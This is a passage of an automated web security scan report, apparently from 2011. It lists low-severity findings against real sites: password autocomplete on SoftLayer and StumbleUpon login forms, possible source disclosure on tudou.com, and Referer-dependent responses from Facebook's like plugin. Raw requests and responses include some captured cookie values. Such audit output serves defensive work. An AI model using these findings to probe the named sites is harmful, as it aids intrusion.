type="password" id="pwd" name="pwd" size="12" tabindex="2" class="input" /></div>
...[SNIP]...
8.16. http://www.softlayer.com/about/contact-us/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.softlayer.com
Path:   /about/contact-us/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /about/contact-us/ HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:16 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:16 GMT
Connection: close
Content-Type: text/html
Content-Length: 26084

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="http
...[SNIP]...
<div
style="margin: 10px 5px 0 0;"><form
method="post" action="https://manage.softlayer.com/index/index" id="loginform" name="loginform"><div
class="portal">
...[SNIP]...
</label> <input
type="password" id="pwd" name="pwd" size="12" tabindex="2" class="input" /></div>
...[SNIP]...
8.17. http://www.softlayer.com/about/feedback  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.softlayer.com
Path:   /about/feedback

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /about/feedback HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:18 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:18 GMT
Connection: close
Content-Type: text/html
Content-Length: 21557

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="http
...[SNIP]...
<div
style="margin: 10px 5px 0 0;"><form
method="post" action="https://manage.softlayer.com/index/index" id="loginform" name="loginform"><div
class="portal">
...[SNIP]...
</label> <input
type="password" id="pwd" name="pwd" size="12" tabindex="2" class="input" /></div>
...[SNIP]...
8.18. http://www.softlayer.com/cloudlayer/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.softlayer.com
Path:   /cloudlayer/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /cloudlayer/ HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:25 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:25 GMT
Connection: close
Content-Type: text/html
Content-Length: 23260

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="http
...[SNIP]...
<div
style="margin: 10px 5px 0 0;"><form
method="post" action="https://manage.softlayer.com/index/index" id="loginform" name="loginform"><div
class="portal">
...[SNIP]...
</label> <input
type="password" id="pwd" name="pwd" size="12" tabindex="2" class="input" /></div>
...[SNIP]...
8.19. http://www.softlayer.com/dedicated/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.softlayer.com
Path:   /dedicated/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /dedicated/ HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:23 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:23 GMT
Connection: close
Content-Type: text/html
Content-Length: 104124

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="http
...[SNIP]...
<div
style="margin: 10px 5px 0 0;"><form
method="post" action="https://manage.softlayer.com/index/index" id="loginform" name="loginform"><div
class="portal">
...[SNIP]...
</label> <input
type="password" id="pwd" name="pwd" size="12" tabindex="2" class="input" /></div>
...[SNIP]...
8.20. http://www.softlayer.com/index.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.softlayer.com
Path:   /index.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /index.html HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:22 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:22 GMT
Connection: close
Content-Type: text/html
Content-Length: 29867

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="http
...[SNIP]...
<div
style="margin: 10px 5px 0 0;"><form
method="post" action="https://manage.softlayer.com/index/index" id="loginform" name="loginform"><div
class="portal">
...[SNIP]...
</label> <input
type="password" id="pwd" name="pwd" size="12" tabindex="2" class="input" /></div>
...[SNIP]...
8.21. http://www.softlayer.com/legal/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.softlayer.com
Path:   /legal/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /legal/ HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:20 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:20 GMT
Connection: close
Content-Type: text/html
Content-Length: 21961

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="http
...[SNIP]...
<div
style="margin: 10px 5px 0 0;"><form
method="post" action="https://manage.softlayer.com/index/index" id="loginform" name="loginform"><div
class="portal">
...[SNIP]...
</label> <input
type="password" id="pwd" name="pwd" size="12" tabindex="2" class="input" /></div>
...[SNIP]...
8.22. http://www.softlayer.com/partners/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.softlayer.com
Path:   /partners/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /partners/ HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:27 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:27 GMT
Connection: close
Content-Type: text/html
Content-Length: 40276

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="ht
...[SNIP]...
<div style="margin: 10px 5px 0 0;">
<form method="post" action="https://manage.softlayer.com/index/index" id="loginform" name="loginform">

<div class="portal">
...[SNIP]...
</label>
<input type="password" id="pwd" name="pwd" size="12" tabindex="2" class="input" />
</div>
...[SNIP]...
8.23. http://www.softlayer.com/press  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.softlayer.com
Path:   /press

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /press HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:28 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:28 GMT
Connection: close
Content-Type: text/html
Content-Length: 76287

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="http
...[SNIP]...
<div
style="margin: 10px 5px 0 0;"><form
method="post" action="https://manage.softlayer.com/index/index" id="loginform" name="loginform"><div
class="portal">
...[SNIP]...
</label> <input
type="password" id="pwd" name="pwd" size="12" tabindex="2" class="input" /></div>
...[SNIP]...
8.24. http://www.softlayer.com/resources/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.softlayer.com
Path:   /resources/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /resources/ HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:22 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:22 GMT
Connection: close
Content-Type: text/html
Content-Length: 23896

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="http
...[SNIP]...
<div
style="margin: 10px 5px 0 0;"><form
method="post" action="https://manage.softlayer.com/index/index" id="loginform" name="loginform"><div
class="portal">
...[SNIP]...
</label> <input
type="password" id="pwd" name="pwd" size="12" tabindex="2" class="input" /></div>
...[SNIP]...
8.25. http://www.softlayer.com/resources/mobile-apps/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.softlayer.com
Path:   /resources/mobile-apps/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /resources/mobile-apps/ HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:21 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:21 GMT
Connection: close
Content-Type: text/html
Content-Length: 24909

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="http
...[SNIP]...
<div
style="margin: 10px 5px 0 0;"><form
method="post" action="https://manage.softlayer.com/index/index" id="loginform" name="loginform"><div
class="portal">
...[SNIP]...
</label> <input
type="password" id="pwd" name="pwd" size="12" tabindex="2" class="input" /></div>
...[SNIP]...
8.26. http://www.softlayer.com/sitemap/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.softlayer.com
Path:   /sitemap/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /sitemap/ HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:29 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:29 GMT
Connection: close
Content-Type: text/html
Content-Length: 27263

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="http
...[SNIP]...
<div
style="margin: 10px 5px 0 0;"><form
method="post" action="https://manage.softlayer.com/index/index" id="loginform" name="loginform"><div
class="portal">
...[SNIP]...
</label> <input
type="password" id="pwd" name="pwd" size="12" tabindex="2" class="input" /></div>
...[SNIP]...
8.27. http://www.softlayer.com/solutions/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.softlayer.com
Path:   /solutions/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /solutions/ HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:26 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:26 GMT
Connection: close
Content-Type: text/html
Content-Length: 24742

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="http
...[SNIP]...
<div
style="margin: 10px 5px 0 0;"><form
method="post" action="https://manage.softlayer.com/index/index" id="loginform" name="loginform"><div
class="portal">
...[SNIP]...
</label> <input
type="password" id="pwd" name="pwd" size="12" tabindex="2" class="input" /></div>
...[SNIP]...
8.28. http://www.softlayer.com/specials/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.softlayer.com
Path:   /specials/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /specials/ HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:29 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:29 GMT
Connection: close
Content-Type: text/html
Content-Length: 20444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="http
...[SNIP]...
<div
style="margin: 10px 5px 0 0;"><form
method="post" action="https://manage.softlayer.com/index/index" id="loginform" name="loginform"><div
class="portal">
...[SNIP]...
</label> <input
type="password" id="pwd" name="pwd" size="12" tabindex="2" class="input" /></div>
...[SNIP]...
8.29. http://www.softlayer.com/virtualization/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.softlayer.com
Path:   /virtualization/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /virtualization/ HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:25 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:25 GMT
Connection: close
Content-Type: text/html
Content-Length: 22859

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="http
...[SNIP]...
<div
style="margin: 10px 5px 0 0;"><form
method="post" action="https://manage.softlayer.com/index/index" id="loginform" name="loginform"><div
class="portal">
...[SNIP]...
</label> <input
type="password" id="pwd" name="pwd" size="12" tabindex="2" class="input" /></div>
...[SNIP]...
8.30. http://www.stumbleupon.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.stumbleupon.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.stumbleupon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 10210
Date: Wed, 06 Jul 2011 11:21:19 GMT
Age: 0
Via: 1.1 varnish
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www
...[SNIP]...
</a>
               <form action="/login.php" name="formLogin" method="post" id="formLogin">                    
                   <ul>
...[SNIP]...
</label>
                           <input class="text" type="password" id="passwordHeader" name="password" maxlength="16" />
                           <input class="text hidden" type="text" value="Password" tabindex="0" name="dummyPassword" id="switch" />
...[SNIP]...
8.31. http://www.stumbleupon.com/login.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.stumbleupon.com
Path:   /login.php

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /login.php HTTP/1.1
Host: www.stumbleupon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 9553
Date: Wed, 06 Jul 2011 11:21:20 GMT
Age: 0
Via: 1.1 varnish
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www
...[SNIP]...
</h1>
                               <form method="post" name="formLogin" action="http://www.stumbleupon.com/login.php" id="loginForm">
                   <fieldset class=" labelLeft">
...[SNIP]...
<div class="iefix">
                               <input class="text" type="password" name="password" value="" maxlength="16" id="password" />
                               <a href="http://www.stumbleupon.com/reset_password/">
...[SNIP]...
9. Source code disclosure  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.tudou.com
Path:   /v/

Issue detail

The application appears to disclose some server-side source code written in ASP.

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.

Request

GET /v/ HTTP/1.1
Host: www.tudou.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: tws0.3
Date: Wed, 06 Jul 2011 14:04:04 GMT
Content-Type: text/html
Connection: close
Set-Cookie: tudou=07290da15c4a46bcc3b820765334a527; path=/; domain=.tudou.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 13738

357c
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="zh-CN" dir="ltr">
<head>
   <meta http-equ
...[SNIP]...
<a class="inner" href="<%=link%>" title="<%=title%>" target="new">
...[SNIP]...
<img class="pack_clipImg" alt="....: <%=title%>" src="<%=pic%>" width="120" height="90"/>
...[SNIP]...
<a href="<%=link%>" title="<%=title%>" target="new"><%=title%></a>
...[SNIP]...
<li>......<%=pubDate%></li>',
                               '<li>......<%=time%></li>',
                               '<li>......<%=playnum%></li>
...[SNIP]...
<a target="_blank" href="<%=userlink%>"><%=ownerName%></a>
...[SNIP]...
10. Referer-dependent response  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses is updated based on Referer data, then the same defences against malicious input should be employed here as for any other kinds of user-supplied data.

Request 1

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3ca49352c%26origin%3Dhttp%253A%252F%252Fsocial.zune.net%252Ff23b1025f4%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fsocial.zune.net%2FMOVIES%2F0%2F34FA18EC-ECDA-4609-BE85-CE80D58C3842%3Ftarget%3Dweb%26culture%3Den-US&layout=button_count&locale=en_US&node_type=link&ref=movie&sdk=joey&show_faces=false&width=100 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://social.zune.net/MOVIES/0/34FA18EC-ECDA-4609-BE85-CE80D58C3842?target=web
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=83J6J

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.246.30
X-Cnection: close
Date: Wed, 06 Jul 2011 11:20:28 GMT
Content-Length: 5867

<!doctype html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8"><script>CavalryLogger=false;</script><title>Like | Facebook</title>
<link type="text/css" rel="stylesheet" h
...[SNIP]...
<div id="connect_widget_4e1444fbf42227f46617671" class="connect_widget button_count" style="font-family: &quot;arial&quot;, sans-serif"><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider"><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center connect_widget_confirm_cell"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_button_count_including hidden_elem"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="thumbs_up hidden_elem"></div></td><td><div class="undo hidden_elem"></div></td></tr><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">2</div></td></tr></tbody></table></td><td class="connect_widget_button_count_excluding"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">1</div></td></tr></tbody></table></td></tr></table></div></div><script type="text/javascript">
Env={module:"like_widget",impid:"acc4a56a",fb_dtsg:"AQDAKBut",no_cookies:1,lhsh:"KAQAICqkb"};
</script>
<script>



onloadRegister(function (){Bootloader.done([])});
onloadRegister(function (){(function() { new ExternalPageLikeWidget({"viewer":0,"channelURL":"http:\/\/static.ak.fbcdn.net\/connect\/xd_proxy.php?version=3#cb=f3ca49352c&origin=http\u00253A\u00252F\u00252Fsocial.zune.net\u00252Ff23b1025f4&relation=parent.parent&transport=postmessage","nodeType":"page","externalURL":"http:\/\/social.zune.net\/MOVIES\/0\/34FA18EC-ECDA-4609-BE85-CE80D58C3842?target=web&culture=en-US","pageId":null,"widgetID":"connect_widg
...[SNIP]...

Request 2

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3ca49352c%26origin%3Dhttp%253A%252F%252Fsocial.zune.net%252Ff23b1025f4%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fsocial.zune.net%2FMOVIES%2F0%2F34FA18EC-ECDA-4609-BE85-CE80D58C3842%3Ftarget%3Dweb%26culture%3Den-US&layout=button_count&locale=en_US&node_type=link&ref=movie&sdk=joey&show_faces=false&width=100 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=83J6J

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.243.40
X-Cnection: close
Date: Wed, 06 Jul 2011 11:20:42 GMT
Content-Length: 5785

<!doctype html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8"><script>CavalryLogger=false;</script><title>Like | Facebook</title>
<link type="text/css" rel="stylesheet" h
...[SNIP]...
<div id="connect_widget_4e14450ab53125f35559986" class="connect_widget button_count" style="font-family: &quot;arial&quot;, sans-serif"><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider"><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center connect_widget_confirm_cell"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_button_count_including hidden_elem"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="thumbs_up hidden_elem"></div></td><td><div class="undo hidden_elem"></div></td></tr><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">2</div></td></tr></tbody></table></td><td class="connect_widget_button_count_excluding"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">1</div></td></tr></tbody></table></td></tr></table></div></div><script type="text/javascript">
Env={module:"like_widget",impid:"9a5258ef",fb_dtsg:"AQDAKBut",no_cookies:1,lhsh:"oAQD_lCNq"};
</script>
<script>



onloadRegister(function (){Bootloader.done([])});
